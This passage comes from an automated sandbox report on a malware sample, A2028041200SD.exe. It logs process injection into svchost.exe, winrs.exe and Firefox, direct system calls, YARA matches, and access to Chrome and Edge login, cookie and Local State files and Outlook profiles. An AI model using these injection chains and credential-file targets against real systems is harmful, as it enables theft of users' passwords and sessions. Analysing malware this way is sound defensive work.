                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]8_2_02F5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBC89D mov eax, dword ptr fs:[00000030h]8_2_02FBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F30887 mov eax, dword ptr fs:[00000030h]8_2_02F30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBE872 mov eax, dword ptr fs:[00000030h]8_2_02FBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBE872 mov eax, dword ptr fs:[00000030h]8_2_02FBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC6870 mov eax, dword ptr fs:[00000030h]8_2_02FC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC6870 mov eax, dword ptr fs:[00000030h]8_2_02FC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F60854 mov eax, dword ptr fs:[00000030h]8_2_02F60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F34859 mov eax, dword ptr fs:[00000030h]8_2_02F34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F34859 mov eax, dword ptr fs:[00000030h]8_2_02F34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F42840 mov ecx, dword ptr fs:[00000030h]8_2_02F42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F52835 mov eax, dword ptr fs:[00000030h]8_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F52835 mov eax, dword ptr fs:[00000030h]8_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F52835 mov eax, dword ptr fs:[00000030h]8_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F52835 mov ecx, dword ptr fs:[00000030h]8_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F52835 mov eax, dword ptr fs:[00000030h]8_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F52835 mov eax, dword ptr fs:[00000030h]8_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A830 mov eax, dword ptr fs:[00000030h]8_2_02F6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD483A mov eax, dword ptr fs:[00000030h]8_2_02FD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD483A mov eax, dword ptr fs:[00000030h]8_2_02FD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBC810 mov eax, dword ptr fs:[00000030h]8_2_02FBC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F629F9 mov eax, dword ptr fs:[00000030h]8_2_02F629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F629F9 mov eax, dword ptr fs:[00000030h]8_2_02F629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]8_2_02FBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]8_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]8_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]8_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]8_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]8_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]8_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F649D0 mov eax, dword ptr fs:[00000030h]8_2_02F649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]8_2_02FFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC69C0 mov eax, dword ptr fs:[00000030h]8_2_02FC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB89B3 mov esi, dword ptr fs:[00000030h]8_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB89B3 mov eax, dword ptr fs:[00000030h]8_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB89B3 mov eax, dword ptr fs:[00000030h]8_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F429A0 mov eax, dword ptr fs:[00000030h]8_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F429A0 mov eax, dword ptr fs:[00000030h]8_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F429A0 mov eax, dword ptr fs:[00000030h]8_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F429A0 mov eax, dword ptr fs:[00000030h]8_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F429A0 mov eax, dword ptr fs:[00000030h]8_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F429A0 mov eax, dword ptr fs:[00000030h]8_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F429A0 mov eax, dword ptr fs:[00000030h]8_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F429A0 mov eax, dword ptr fs:[00000030h]8_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F429A0 mov eax, dword ptr fs:[00000030h]8_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F429A0 mov eax, dword ptr fs:[00000030h]8_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F429A0 mov eax, dword ptr fs:[00000030h]8_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F429A0 mov eax, dword ptr fs:[00000030h]8_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F429A0 mov eax, dword ptr fs:[00000030h]8_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F309AD mov eax, dword ptr fs:[00000030h]8_2_02F309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F309AD mov eax, dword ptr fs:[00000030h]8_2_02F309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD4978 mov eax, dword ptr fs:[00000030h]8_2_02FD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD4978 mov eax, dword ptr fs:[00000030h]8_2_02FD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBC97C mov eax, dword ptr fs:[00000030h]8_2_02FBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F56962 mov eax, dword ptr fs:[00000030h]8_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F56962 mov eax, dword ptr fs:[00000030h]8_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F56962 mov eax, dword ptr fs:[00000030h]8_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F7096E mov eax, dword ptr fs:[00000030h]8_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F7096E mov edx, dword ptr fs:[00000030h]8_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F7096E mov eax, dword ptr fs:[00000030h]8_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB0946 mov eax, dword ptr fs:[00000030h]8_2_02FB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB892A mov eax, dword ptr fs:[00000030h]8_2_02FB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC892B mov eax, dword ptr fs:[00000030h]8_2_02FC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBC912 mov eax, dword ptr fs:[00000030h]8_2_02FBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F28918 mov eax, dword ptr fs:[00000030h]8_2_02F28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F28918 mov eax, dword ptr fs:[00000030h]8_2_02F28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE908 mov eax, dword ptr fs:[00000030h]8_2_02FAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE908 mov eax, dword ptr fs:[00000030h]8_2_02FAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F68EF5 mov eax, dword ptr fs:[00000030h]8_2_02F68EF5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36EE0 mov eax, dword ptr fs:[00000030h]8_2_02F36EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36EE0 mov eax, dword ptr fs:[00000030h]8_2_02F36EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36EE0 mov eax, dword ptr fs:[00000030h]8_2_02F36EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36EE0 mov eax, dword ptr fs:[00000030h]8_2_02F36EE0
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0092A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0092A66C
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00918189 SetUnhandledExceptionFilter,0_2_00918189
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009181AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009181AC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtProtectVirtualMemory: Direct from: 0x77667B2EJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtAllocateVirtualMemory: Direct from: 0x77672BECJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtAllocateVirtualMemory: Direct from: 0x77673C9CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\winrs.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeThread register set: target process: 5980Jump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 23D2008Jump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0092B106 LogonUserW,0_2_0092B106
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_008F3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008F3D19
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0093411C SendInput,keybd_event,0_2_0093411C
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009374BB mouse_event,0_2_009374BB
                Source: C:\Users\user\Desktop\A2028041200SD.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\A2028041200SD.exe"Jump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeProcess created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0092A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0092A66C
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009371FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_009371FA
                Source: A2028041200SD.exe, zJGHFZpQDL.exe, 00000009.00000002.3124130451.0000000001431000.00000002.00000001.00040000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000000.1311242597.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: zJGHFZpQDL.exe, 00000009.00000002.3124130451.0000000001431000.00000002.00000001.00040000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000000.1311242597.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: zJGHFZpQDL.exe, 00000009.00000002.3124130451.0000000001431000.00000002.00000001.00040000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000000.1311242597.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: A2028041200SD.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: zJGHFZpQDL.exe, 00000009.00000002.3124130451.0000000001431000.00000002.00000001.00040000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000000.1311242597.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009165C4 cpuid 0_2_009165C4
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0094091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0094091D
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0096B340 GetUserNameW,0_2_0096B340
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00921E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00921E8E
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0090DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0090DDC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 8.2.svchost.exe.24b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.svchost.exe.24b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3124723950.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1391788061.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3124795821.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1391861547.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1390489944.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3121706684.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3132931690.0000000008020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3124924415.0000000004A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: A2028041200SD.exeBinary or memory string: WIN_81
                Source: A2028041200SD.exeBinary or memory string: WIN_XP
                Source: A2028041200SD.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: A2028041200SD.exeBinary or memory string: WIN_XPe
                Source: A2028041200SD.exeBinary or memory string: WIN_VISTA
                Source: A2028041200SD.exeBinary or memory string: WIN_7
                Source: A2028041200SD.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 8.2.svchost.exe.24b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.svchost.exe.24b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3124723950.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1391788061.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3124795821.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1391861547.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1390489944.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3121706684.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
